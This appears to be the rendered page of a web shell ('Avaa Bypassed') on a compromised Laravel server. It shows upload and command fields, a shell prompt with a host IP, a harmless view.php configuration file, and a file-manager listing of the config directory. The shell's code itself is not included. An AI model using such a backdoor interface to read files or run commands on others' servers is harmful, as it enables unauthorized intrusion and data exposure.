404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@52.14.121.12: ~ $
<?php

return [
    /*
    |--------------------------------------------------------------------------
    | Compiled View Path
    |--------------------------------------------------------------------------
    |
    | This option determines where all the compiled Blade templates will be
    | stored for your application. Typically, this is within the storage
    | directory. However, as usual, you are free to change this value.
    |
    */

    'cache' => false,
    'compiled' => realpath(sys_get_temp_dir()),

    /*
    |--------------------------------------------------------------------------
    | View Storage Paths
    |--------------------------------------------------------------------------
    |
    | Most templating systems load templates from disk. Here you may specify
    | an array of paths that should be checked for your views. Of course
    | the usual Laravel view path has already been registered for you.
    |
    */

    'paths' => [
        resource_path('views'),
    ],

];

Filemanager

Name Type Size Permission Actions
app.php File 2.18 KB 0644
commands.php File 3.47 KB 0644
view.php File 1.02 KB 0644